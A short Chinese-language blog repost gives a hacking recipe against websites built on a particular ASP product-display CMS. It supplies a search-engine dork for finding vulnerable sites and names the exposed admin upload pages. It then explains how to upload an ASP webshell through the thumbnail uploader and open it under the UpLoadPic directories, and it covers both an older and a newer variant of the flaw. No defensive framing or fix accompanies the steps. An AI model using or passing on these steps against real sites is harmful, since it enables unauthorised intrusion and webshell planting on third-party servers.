原漏洞:
搜索 inurl:cpzs.asp?ProClass=
根目录下 /manage/Product/add_news.asp
缩略图上传asp马
提交后,选择EDIT 找到那个asp的名称
构造
http://网址/UpLoadPic/Pro_Pic/上传获得的地址.asp
最新的漏洞:
搜索 inurl:cpzs.asp?ProClass=
根目录下 manage/Product/add_newsclass.asp
直接缩略图上传asp的马
提交后
去选那个EDIT 找到那个你上穿的asp马
构造
http://网址 /UpLoadPic/ProClass_Pic/上传获得的地址.asp
本文转自 小王 51CTO博客,原文链接:http://blog.51cto.com/xiaowang/300745,如需转载请自行联系原作者